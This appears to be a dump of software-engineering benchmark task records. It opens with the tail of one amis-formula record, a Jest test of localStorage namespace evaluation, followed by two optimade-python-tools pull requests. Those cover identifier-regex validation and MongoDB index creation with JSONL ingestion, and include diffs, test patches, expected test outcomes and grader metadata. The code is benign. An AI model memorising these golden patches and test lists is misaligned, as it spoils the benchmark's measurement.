data)).toBe(data.infinity); expect(evaluate('${POW(1, infinity)}', data)).toBe(NaN); expect(evaluate('${POW(2, infinity)}', data)).toBe(data.infinity); -}) +}); + +test('evalute:namespace', () => { + localStorage.setItem('a', '1'); + localStorage.setItem('b', '2'); + localStorage.setItem('c', '{"a": 1, "b": 2, "c": {"d": 4}}'); + localStorage.setItem('key', 'c'); + localStorage.setItem('spec-var-name', 'you are right'); + + expect(evaluate('${ls: a}', {})).toBe(1); + expect(evaluate('${ls: b}', {})).toBe(2); + expect(evaluate('${ls: c}', {})).toMatchObject({a: 1, b: 2, c: {d: 4}}); + // 被认为是减操作 + expect(evaluate('${ls: spec-var-name}', {})).toBe(0); + expect(evaluate('${ls: spec\\-var\\-name}', {})).toBe('you are right'); + expect(evaluate('${ls: &["spec-var-name"]}', {})).toBe('you are right'); + expect(evaluate('${ls: &["c"]["c"]}', {})).toMatchObject({d: 4}); + expect(evaluate('${ls: &["c"][key]}', {})).toMatchObject({d: 4}); +});
[ "evalute:namespace", "async-evalute:namespace" ]
[ "evalute:simple", "evalute:filter", "evalute:filter2", "evalute:filter3", "evalute:filter4", "evalute:keywords", "evalute:oldVariable", "evalute:ariable2", "evalute:ariable3", "evalute:object-variable", "evalute:literal-variable", "evalute:tempalte", "evalute:literal", "evalute:variableName", "evalute:3-1", "evalate:0.1+0.2", "evalute:variable:com.xxx.xx", "evalute:anonymous:function", "evalute:anonymous:function2", "evalute:array:func", "evalute:ISTYPE", "evalute:Math", "lexer:simple", "lexer:filter", "lexer:exception", "parser:simple", "parser:complex", "parser:evalMode", "parser:template", "parser:string", "parser:number", "parser:single-string", "parser:object-literall", "parser:array-literall", "parser:variable-geter", "parser:variable-geter2", "parser:multi-expression", "parser:functionCall", "parser:filter", "parser:filter-escape", "parser:conditional", "parser:binary-expression", "parser:group-expression", "parser:unary-expression", "parser:anonymous-function", "formula:expression", "formula:expression2", "formula:expression3", "formula:if", "formula:and", "formula:or", "formula:xor", "formula:ifs", "formula:math", "formula:text", "formula:date", "formula:last", "formula:basename", "formula:customFunction" ]
No new interfaces are introduced.
custom-check-github
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "cd packages/amis-formula && npx jest --verbose --no-color" }
{ "num_modified_files": 6, "num_modified_lines": 95, "pr_author": "2betop", "pr_labels": [ "feat" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.92, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-2d72bdead8afa0798d18995311992d684348a694c2d5e214e8e4d2b6153e4821L8-R9", "https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-7ae45ad102eab3b6d7e7896acd08c427a9b25b346470d7bc6507b6481575d519L7-R7", "https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-2461f3811423634aee38270e1d12bcf581b95eb845cb00a3ea5eae804a57795cL3-R3", "https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-2461f3811423634aee38270e1d12bcf581b95eb845cb00a3ea5eae804a57795cL49-R49", "https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-2a1582dd8536cd65b762f9cd79719e90b98bdc38b808db0aaf783039f53d4153L3-R3", "https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-0e30bcb7b6942e615a81bbcc87d75a7279e22d52e521bd61e050c056f6efe78cL6-R6", "https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-0e30bcb7b6942e615a81bbcc87d75a7279e22d52e521bd61e050c056f6efe78cL39-R40", "https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-b49028542a3bb14de6e47e46a9f09f23ffeff3afea2a17d5ddace75726a33e12L3-R3", "https://github.com/baidu/amis/pull/8385/files?diff=unified&w=0#diff-b49028542a3bb14de6e47e46a9f09f23ffeff3afea2a17d5ddace75726a33e12L40-R41" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests support for accessing cookie, localStorage, and sessionStorage via namespace syntax and handling complex variable names using &[...] syntax. 
The provided test patch verifies these behaviors, and the golden patch implements the necessary evaluator logic and helper adjustments, aligning with the stated requirements. No signals of missing specs, external dependencies, or naming expectations are present, so the task is well‑defined and solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
983b98f9573e1bc58602bb78ea31d87d3ce829a0
2024-06-13 20:29:57
codecov[bot]: ## [Codecov](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2097?dropdown=coverage&src=pr&el=h1&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) Report All modified and coverable lines are covered by tests :white_check_mark: > Project coverage is 90.70%. Comparing base [(`983b98f`)](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/983b98f9573e1bc58602bb78ea31d87d3ce829a0?dropdown=coverage&el=desc&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) to head [(`bbd43a2`)](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/bbd43a2734b82b3fcd222010dd47b4d1b5628d51?dropdown=coverage&el=desc&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia). <details><summary>Additional details and impacted files</summary> ```diff @@ Coverage Diff @@ ## master #2097 +/- ## ======================================= Coverage 90.69% 90.70% ======================================= Files 75 75 Lines 4740 4743 +3 ======================================= + Hits 4299 4302 +3 Misses 441 441 ``` | [Flag](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2097/flags?src=pr&el=flags&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | Coverage Δ | | |---|---|---| | [project](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2097/flags?src=pr&el=flag&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | `90.70% <100.00%> (+<0.01%)` | :arrow_up: | | [validator](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2097/flags?src=pr&el=flag&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) 
| `?` | | Flags with carried forward coverage won't be shown. [Click here](https://docs.codecov.io/docs/carryforward-flags?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#carryforward-flags-in-the-pull-request-comment) to find out more. </details> [:umbrella: View full report in Codecov by Sentry](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2097?dropdown=coverage&src=pr&el=continue&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia). :loudspeaker: Have feedback on the report? [Share it here](https://about.codecov.io/codecov-pr-comment-feedback/?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia).
materials-consortia__optimade-python-tools-2097
diff --git a/openapi/openapi.json b/openapi/openapi.json index c5f1a39e..11eb639e 100644 --- a/openapi/openapi.json +++ b/openapi/openapi.json @@ -1664,8 +1664,10 @@ "description": "Description of the entry." }, "properties": { - "additionalProperties": { - "$ref": "#/components/schemas/EntryInfoProperty" + "patternProperties": { + "^[a-z_][a-z_0-9]+$": { + "$ref": "#/components/schemas/EntryInfoProperty" + } }, "type": "object", "title": "Properties", @@ -1674,7 +1676,8 @@ "output_fields_by_format": { "additionalProperties": { "items": { - "type": "string" + "type": "string", + "pattern": "^[a-z_][a-z_0-9]+$" }, "type": "array" }, diff --git a/optimade/models/entries.py b/optimade/models/entries.py index 8728a7af..414b4dde 100644 --- a/optimade/models/entries.py +++ b/optimade/models/entries.py @@ -8,6 +8,7 @@ from optimade.models.optimade_json import ( BaseRelationshipResource, DataType, Relationship, + ValidIdentifier, ) from optimade.models.utils import OptimadeField, StrictField, SupportLevel @@ -226,14 +227,14 @@ class EntryInfoResource(BaseModel): description: Annotated[str, StrictField(description="Description of the entry.")] properties: Annotated[ - dict[str, EntryInfoProperty], + dict[ValidIdentifier, EntryInfoProperty], StrictField( description="A dictionary describing queryable properties for this entry type, where each key is a property name.", ), ] output_fields_by_format: Annotated[ - dict[str, list[str]], + dict[str, list[ValidIdentifier]], StrictField( description="Dictionary of available output fields for this entry type, where the keys are the values of the `formats` list and the values are the keys of the `properties` dictionary.", ), diff --git a/optimade/models/optimade_json.py b/optimade/models/optimade_json.py index 348cb904..1aace40e 100644 --- a/optimade/models/optimade_json.py +++ b/optimade/models/optimade_json.py @@ -4,11 +4,11 @@ from datetime import datetime from enum import Enum from typing import Annotated, Any, Literal, Optional, 
Union -from pydantic import BaseModel, ConfigDict, EmailStr, model_validator +from pydantic import BaseModel, ConfigDict, EmailStr, Field, model_validator from optimade.models import jsonapi from optimade.models.types import SemanticVersion -from optimade.models.utils import StrictField +from optimade.models.utils import IDENTIFIER_REGEX, StrictField __all__ = ( "DataType", @@ -25,6 +25,9 @@ __all__ = ( "Relationship", ) +ValidIdentifier = Annotated[str, Field(pattern=IDENTIFIER_REGEX)] +"""A type that constrains strings to valid OPTIMADE identifiers (e.g., property names, ID strings).""" + class DataType(Enum): """Optimade Data types diff --git a/optimade/models/utils.py b/optimade/models/utils.py index 50349e3d..44f3109c 100644 --- a/optimade/models/utils.py +++ b/optimade/models/utils.py @@ -26,6 +26,7 @@ OPTIMADE_SCHEMA_EXTENSION_KEYS = ["support", "queryable", "unit", "sortable"] OPTIMADE_SCHEMA_EXTENSION_PREFIX = "x-optimade-" SEMVER_PATTERN = r"^(0|[1-9]\d*)\.(0|[1-9]\d*)\.(0|[1-9]\d*)(?:-((?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\.(?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\+([0-9a-zA-Z-]+(?:\.[0-9a-zA-Z-]+)*))?$" +IDENTIFIER_REGEX = r"^[a-z_][a-z_0-9]+$" class SupportLevel(Enum):
Validate property names against identifier regular expression This PR implements property name validation against identifier regular expression as laid out in OPTIMADE specification.
**Title** Enforce OPTIMADE identifier rules for property and field names **Problem** Clients could supply arbitrary strings as property names or output‑field identifiers, which violates the OPTIMADE specification that mandates a specific identifier pattern. This leads to non‑conforming APIs and potential downstream failures. **Root Cause** The data models and OpenAPI definitions used unrestricted string keys, lacking any pattern validation for identifiers. **Fix / Expected Behavior** - Introduce a dedicated identifier type that enforces the official regex pattern. - Apply this type to all dictionary keys representing property names and output‑field identifiers. - Update the OpenAPI schema to use `patternProperties` and `pattern` constraints reflecting the identifier regex. - Validation now rejects any property or field name that does not match the required pattern, raising clear errors. **Risk & Validation** - May reject existing datasets that contain non‑conforming identifiers; verify compatibility or migration paths. - Ensure that model validation and OpenAPI generation correctly propagate the new constraints through unit and integration tests. - Run the full test suite to confirm no unintended breakage in other parts of the library.
2,097
Materials-Consortia/optimade-python-tools
diff --git a/tests/models/test_baseinfo.py b/tests/models/test_baseinfo.py index 6d24a116..49d9bd52 100644 --- a/tests/models/test_baseinfo.py +++ b/tests/models/test_baseinfo.py @@ -2,6 +2,7 @@ import pytest from pydantic import ValidationError from optimade.models.baseinfo import AvailableApiVersion +from optimade.models.entries import EntryInfoResource def test_available_api_versions(): @@ -57,3 +58,34 @@ def test_available_api_versions(): for data in good_combos: assert isinstance(AvailableApiVersion(**data), AvailableApiVersion) + + +def test_good_entry_info_custom_properties(): + test_good_info = { + "formats": ["json", "xml"], + "description": "good info data", + "output_fields_by_format": {"json": ["nelements", "id"]}, + "properties": { + "nelements": {"description": "num elements", "type": "integer"}, + "_custom_field": {"description": "good custom field", "type": "string"}, + }, + } + assert EntryInfoResource(**test_good_info) + + +def test_bad_entry_info_custom_properties(): + """Checks that error is raised if custom field contains upper case letter.""" + test_bad_info = { + "formats": ["json", "xml"], + "description": "bad info data", + "output_fields_by_format": {"json": ["nelements", "id"]}, + "properties": { + "nelements": {"description": "num elements", "type": "integer"}, + "_custom_Field": {"description": "bad custom field", "type": "string"}, + }, + } + with pytest.raises( + ValueError, + match=".*[type=string_pattern_mismatch, input_value='_custom_Field', input_type=str].*", + ): + EntryInfoResource(**test_bad_info)
[ "tests/models/test_baseinfo.py::test_bad_entry_info_custom_properties" ]
[ "tests/models/test_baseinfo.py::test_available_api_versions", "tests/models/test_baseinfo.py::test_good_entry_info_custom_properties" ]
Method: EntryInfoResource.__init__(self, formats: list[str], description: str, output_fields_by_format: dict[str, list[ValidIdentifier]], properties: dict[ValidIdentifier, EntryInfoProperty]) Location: optimade.models.entries Inputs: - **formats** – list of supported format strings (e.g., “json”, “xml”). - **description** – free‑text description of the entry type. - **output_fields_by_format** – mapping from each format name to a list of property identifiers that are valid output fields; each identifier must match the OPTIMADE identifier regex `^[a-z_][a-z_0-9]+$` (including leading underscores). - **properties** – dictionary whose keys are property identifiers (constrained by the same regex) and whose values are `EntryInfoProperty` objects describing each property. Outputs: Returns a validated `EntryInfoResource` instance. Raises `ValueError` (wrapped by Pydantic as a validation error) when any identifier in `output_fields_by_format` or `properties` does not satisfy the identifier pattern. Description: Constructs a validated entry‑info resource model, enforcing that all custom property names and referenced output fields conform to the OPTIMADE identifier regular expression.
MIT
{ "base_image_name": "python_base_310", "install": [ "git submodule update --init --recursive", "pip install -q -r requirements.txt -r requirements-dev.txt -r requirements-server.txt -r requirements-http-client.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/models/test_baseinfo.py" }
{ "num_modified_files": 4, "num_modified_lines": 15, "pr_author": "merkys", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.97, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue asks for property name validation against the OPTIMADE identifier regex. The added tests verify that a valid custom property passes and that a property with an uppercase letter raises a ValueError, matching the intended behavior. The tests directly reflect the specification without referencing external resources or implicit naming expectations, so there are no B‑category problems. Therefore the task is clearly defined and solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, 
"test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
ce04b39d8a6488b9220f0a8f23f55e09886205fa
2024-10-30 11:20:48
codecov[bot]: ## [Codecov](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2175?dropdown=coverage&src=pr&el=h1&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) Report Attention: Patch coverage is `48.00000%` with `13 lines` in your changes missing coverage. Please review. > Project coverage is 90.65%. Comparing base [(`ccc8b64`)](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/ccc8b64fb844fac9b93a137438e4e32074b0770b?dropdown=coverage&el=desc&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) to head [(`7ff086e`)](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/7ff086e316f4ecc3752559c156db61f7069c1c97?dropdown=coverage&el=desc&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia). | [Files with missing lines](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2175?dropdown=coverage&src=pr&el=tree&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | Patch % | Lines | |---|---|---| | [optimade/utils.py](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2175?src=pr&el=tree&filepath=optimade%2Futils.py&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#diff-b3B0aW1hZGUvdXRpbHMucHk=) | 50.00% | [9 Missing :warning: ](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2175?src=pr&el=tree&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | | 
[optimade/server/entry\_collections/mongo.py](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2175?src=pr&el=tree&filepath=optimade%2Fserver%2Fentry_collections%2Fmongo.py&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#diff-b3B0aW1hZGUvc2VydmVyL2VudHJ5X2NvbGxlY3Rpb25zL21vbmdvLnB5) | 40.00% | [3 Missing :warning: ](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2175?src=pr&el=tree&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | | [...made/server/entry\_collections/entry\_collections.py](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2175?src=pr&el=tree&filepath=optimade%2Fserver%2Fentry_collections%2Fentry_collections.py&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#diff-b3B0aW1hZGUvc2VydmVyL2VudHJ5X2NvbGxlY3Rpb25zL2VudHJ5X2NvbGxlY3Rpb25zLnB5) | 50.00% | [1 Missing :warning: ](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2175?src=pr&el=tree&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | <details><summary>Additional details and impacted files</summary> ```diff @@ Coverage Diff @@ ## main #2175 +/- ## ========================================== - Coverage 90.80% 90.65% -0.16% ========================================== Files 75 75 Lines 4819 4836 +17 ========================================== + Hits 4376 4384 +8 - Misses 443 452 +9 ``` | [Flag](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2175/flags?src=pr&el=flags&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | Coverage Δ | | |---|---|---| | 
[project](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2175/flags?src=pr&el=flag&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | `90.65% <48.00%> (-0.16%)` | :arrow_down: | | [validator](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2175/flags?src=pr&el=flag&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | `90.65% <48.00%> (-0.16%)` | :arrow_down: | Flags with carried forward coverage won't be shown. [Click here](https://docs.codecov.io/docs/carryforward-flags?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#carryforward-flags-in-the-pull-request-comment) to find out more. </details> [:umbrella: View full report in Codecov by Sentry](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2175?dropdown=coverage&src=pr&el=continue&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia). :loudspeaker: Have feedback on the report? [Share it here](https://about.codecov.io/codecov-pr-comment-feedback/?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia). ml-evs: I'm going to merge, can potentially backport these changes to 1.1.x but not super important, otherwise will wait for 1.2.x release
materials-consortia__optimade-python-tools-2175
diff --git a/optimade/server/config.py b/optimade/server/config.py index 29ba11a1..7b56469c 100644 --- a/optimade/server/config.py +++ b/optimade/server/config.py @@ -180,6 +180,16 @@ class ServerConfig(BaseSettings): ), ] = None + create_default_index: Annotated[ + bool, + Field( + description=( + "Whether to create a set of default indices " + "for supporting databases after inserting JSONL data." + ) + ), + ] = False + use_real_mongo: Annotated[ bool | None, Field(description="DEPRECATED: force usage of MongoDB over any other backend."), diff --git a/optimade/server/entry_collections/elasticsearch.py b/optimade/server/entry_collections/elasticsearch.py index 7b0fffc7..5bc52016 100644 --- a/optimade/server/entry_collections/elasticsearch.py +++ b/optimade/server/entry_collections/elasticsearch.py @@ -48,14 +48,19 @@ class ElasticCollection(EntryCollection): self.client = client if client else CLIENT self.name = name - # If we are creating a new collection from scratch, also create the index, - # otherwise assume it has already been created externally - if CONFIG.insert_test_data: - self.create_optimade_index() - def count(self, *args, **kwargs) -> int: raise NotImplementedError + def create_default_index(self) -> None: + """Create the default index for the collection. + + For Elastic, the default is to create a search index + over all relevant OPTIMADE fields based on the configured + mapper. + + """ + return self.create_optimade_index() + def create_optimade_index(self) -> None: """Load or create an index that can handle aliased OPTIMADE fields and attach it to the current client. @@ -111,7 +116,7 @@ class ElasticCollection(EntryCollection): """Returns the total number of entries in the collection.""" return Search(using=self.client, index=self.name).execute().hits.total.value - def insert(self, data: list[EntryResource]) -> None: + def insert(self, data: list[EntryResource | dict]) -> None: """Add the given entries to the underlying database. 
Warning: diff --git a/optimade/server/entry_collections/entry_collections.py b/optimade/server/entry_collections/entry_collections.py index 308842ce..caa4593f 100644 --- a/optimade/server/entry_collections/entry_collections.py +++ b/optimade/server/entry_collections/entry_collections.py @@ -119,11 +119,16 @@ class EntryCollection(ABC): """Returns the total number of entries in the collection.""" @abstractmethod - def insert(self, data: list[EntryResource]) -> None: + def insert(self, data: list[EntryResource | dict]) -> None: """Add the given entries to the underlying database. + Warning: + No validation is performed on the incoming data, this data + should have been mapped to the appropriate format before + insertion. + Arguments: - data: The entry resource objects to add to the database. + data: The entries to add to the database. """ @@ -274,6 +279,30 @@ class EntryCollection(ABC): return self._all_fields + def create_index(self, field: str, unique: bool = False) -> None: + """Create an index on the given field, as stored in the database. + + Arguments: + field: The database field to index (i.e., if different from the OPTIMADE field, + the mapper should be used to convert between the two). + unique: Whether or not the index should be unique. + + """ + raise NotImplementedError + + def create_default_index(self) -> None: + """Create the default index for the collection. + + For example, a database backend could override this method to + create a unique index on the `id` field, so that it can be called + on server startup. + + This method should use a mapper to convert any OPTIMADE field names + to the corresponding stored names in the database. 
+ + """ + raise NotImplementedError + def get_attribute_fields(self) -> set[str]: """Get the set of attribute fields diff --git a/optimade/server/entry_collections/mongo.py b/optimade/server/entry_collections/mongo.py index 77d2c694..6740f6a5 100644 --- a/optimade/server/entry_collections/mongo.py +++ b/optimade/server/entry_collections/mongo.py @@ -91,17 +91,43 @@ class MongoCollection(EntryCollection): except ExecutionTimeout: return None - def insert(self, data: list[EntryResource]) -> None: + def insert(self, data: list[EntryResource | dict]) -> None: """Add the given entries to the underlying database. Warning: - No validation is performed on the incoming data. + No validation is performed on the incoming data, this data + should have been mapped to the appropriate format before + insertion. Arguments: - data: The entry resource objects to add to the database. + data: The entries to add to the database. """ - self.collection.insert_many(data) + self.collection.insert_many(data, ordered=False) + + def create_index(self, field: str, unique: bool = False) -> None: + """Create an index on the given field, as stored in the database. + + If any error is raised during index creation, this method should faithfully + return it, except for the simple case where an identical index already exists. + + Arguments: + field: The database field to index (i.e., if different from the OPTIMADE field, + the mapper should be used to convert between the two). + unique: Whether or not the index should be unique. + + """ + self.collection.create_index(field, unique=unique, background=True) + + def create_default_index(self) -> None: + """Create the default index for the collection. + + For MongoDB, the default is to create a unique index + on the `id` field. This method should obey any configured + mappers. 
+ + """ + self.create_index(self.resource_mapper.get_backend_field("id"), unique=True) def handle_query_params( self, params: EntryListingQueryParams | SingleEntryQueryParams diff --git a/optimade/server/main.py b/optimade/server/main.py index f563f365..74f770ea 100644 --- a/optimade/server/main.py +++ b/optimade/server/main.py @@ -123,7 +123,7 @@ if CONFIG.insert_test_data or CONFIG.insert_from_jsonl: f"Requested JSONL file does not exist: {jsonl_path}. Please specify an absolute group." ) - insert_from_jsonl(jsonl_path) + insert_from_jsonl(jsonl_path, create_default_index=CONFIG.create_default_index) LOGGER.debug("Inserted data from JSONL file: %s", jsonl_path) if CONFIG.insert_test_data: diff --git a/optimade/utils.py b/optimade/utils.py index 45829726..306bb327 100644 --- a/optimade/utils.py +++ b/optimade/utils.py @@ -7,7 +7,6 @@ import contextlib import json from collections.abc import Container, Iterable from pathlib import Path -from traceback import print_exc from typing import TYPE_CHECKING, Optional from requests.exceptions import SSLError @@ -25,17 +24,19 @@ PROVIDER_LIST_URLS = ( ) -def insert_from_jsonl(jsonl_path: Path) -> None: +def insert_from_jsonl(jsonl_path: Path, create_default_index: bool = False) -> None: """Insert OPTIMADE JSON lines data into the database. Arguments: jsonl_path: Path to the JSON lines file. + create_default_index: Whether to create a default index on the `id` field. 
""" from collections import defaultdict import bson.json_util + from optimade.server.logger import LOGGER from optimade.server.routers import ENTRY_COLLECTIONS batch = defaultdict(list) @@ -50,6 +51,16 @@ def insert_from_jsonl(jsonl_path: Path) -> None: ) jsonl_path = _jsonl_path + # If the chosen database backend supports it, make the default indices + if create_default_index: + for entry_type in ENTRY_COLLECTIONS: + try: + ENTRY_COLLECTIONS[entry_type].create_default_index() + except NotImplementedError: + pass + + bad_rows: int = 0 + good_rows: int = 0 with open(jsonl_path) as handle: header = handle.readline() header_jsonl = json.loads(header) @@ -57,12 +68,19 @@ def insert_from_jsonl(jsonl_path: Path) -> None: "x-optimade" ), "No x-optimade header, not sure if this is a JSONL file" - for json_str in handle: + for line_no, json_str in enumerate(handle): try: - entry = bson.json_util.loads(json_str) + if json_str.strip(): + entry = bson.json_util.loads(json_str) + else: + LOGGER.warning("Could not read any data from L%s", line_no) + bad_rows += 1 + continue except json.JSONDecodeError: - print(f"Could not read entry as JSON: {json_str}") - print_exc() + from optimade.server.logger import LOGGER + + LOGGER.warning("Could not read entry L%s JSON: '%s'", line_no, json_str) + bad_rows += 1 continue try: id = entry.get("id", None) @@ -76,19 +94,26 @@ def insert_from_jsonl(jsonl_path: Path) -> None: # Append the data to the batch batch[_type].append(inp_data) except Exception as exc: - print(f"Error with entry {entry}: {exc}") - print_exc() + LOGGER.warning(f"Error with entry at L{line_no} -- {entry} -- {exc}") + bad_rows += 1 continue if len(batch[_type]) >= batch_size: ENTRY_COLLECTIONS[_type].insert(batch[_type]) batch[_type] = [] + good_rows += 1 + # Insert any remaining data for entry_type in batch: ENTRY_COLLECTIONS[entry_type].insert(batch[entry_type]) batch[entry_type] = [] + if bad_rows: + LOGGER.warning("Could not read %d rows from the JSONL file", bad_rows) 
+ + LOGGER.info("Inserted %d rows from the JSONL file", good_rows) + def mongo_id_for_database(database_id: str, database_type: str) -> str: """Produce a MongoDB ObjectId for a database"""
Quality of life changes around JSONL & MongoDB - Better error handling and logging on JSONL insert - Parallel inserts from MongoDB - Convenience methods and config for creating indexes: nothing changes by default, but indexes can now be made when inserting from JSONL data.
**Title** Add optional default index creation and improve robustness of JSONL data ingestion **Problem** Loading JSONL files could fail silently on malformed lines and did not automatically create required database indexes, leading to potential duplicate‑key errors and sub‑optimal query performance. **Root Cause** The ingestion routine assumed all rows were valid and the backend collections lacked a generic way to create needed indexes, especially a unique index on the identifier field. **Fix / Expected Behavior** - Introduce a server configuration flag that, when enabled, creates backend‑specific default indexes (e.g., unique `id` index) before JSONL insertion. - Extend the collection abstraction with methods for creating arbitrary and default indexes, with concrete implementations for supported back‑ends. - Refactor JSONL loading to: * Skip empty lines and log them. * Catch and log JSON parsing errors without aborting the whole import. * Continue inserting remaining records using unordered bulk operations. * Report counts of successfully inserted and failed rows. - Preserve existing behavior when the new flag is disabled. **Risk & Validation** - Verify that automatic index creation does not clash with existing user‑defined indexes. - Ensure unordered bulk inserts correctly handle duplicate or problematic records across all back‑ends. - Run integration tests that feed both well‑formed and malformed JSONL files, checking that logs reflect accurate row counts and that the database contains the expected entries.
2,175
Materials-Consortia/optimade-python-tools
